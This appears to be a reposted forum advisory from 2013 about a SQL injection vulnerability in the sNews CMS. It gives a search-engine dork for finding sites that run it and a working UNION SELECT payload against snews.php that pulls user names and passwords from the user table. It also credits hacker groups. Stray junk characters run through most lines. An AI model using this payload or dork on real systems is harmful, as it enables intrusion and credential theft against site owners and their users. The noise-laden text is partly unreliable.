标题: CMS snews SQL Injection Vulnerability( |# s. Z- O% v; A1 [& e
作者: By onestree
5 f( y+ K9 O, F4 k下载地址 : http://snewscms.com/
$ h& o" y; P! I测试平台 : ubuntu 12.10 / win 7
) s1 _) v/ n* I/ U: M$ E$ b3 n关键词: inurl:"tanyakan pada rumput yang bergoyang"
5 W" R( E9 r- y% L! Q5 {9 O ) l# j; W5 d: y! u- K6 k3 M& T
: c7 i6 ~# u+ j4 Y8 h7 `*************************************************************% u& Z/ t+ A6 N6 u
$ p2 V) r/ ~' m0 ~/ R$ oSQL poc:
5 f* a: j5 F- w0 I
, f( r8 O5 c: c* ?http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]4 ^ T( N7 T9 C3 J
" s0 N6 P' W6 |$ k4 i/ ^示例
' {/ R# Q4 B5 A1 | f3 y
' R: i$ y3 A+ Z) D9 Uhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*. W8 Z. R9 u9 D% e
3 U7 \3 z4 Z1 k7 l# i' N4 z 7 }. d& m# g% R2 a7 |3 l
致谢:0 ~/ P3 f9 d7 ?9 m$ U
' R6 i3 o! E! A Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
9 d, }" W, K3 N* c5 V) U+ K
: A8 [4 ]( j/ v4 a5 d indonesiancoder - moeslimh4x0r - go-coder8 F7 r+ t& R0 E6 b4 @: m
/ o" g/ v+ j' r9 u
spesial my hunny :*8 Z# R* r$ }& s+ |
|
发表于 2013-1-23 08:55:06
收藏
支持
反对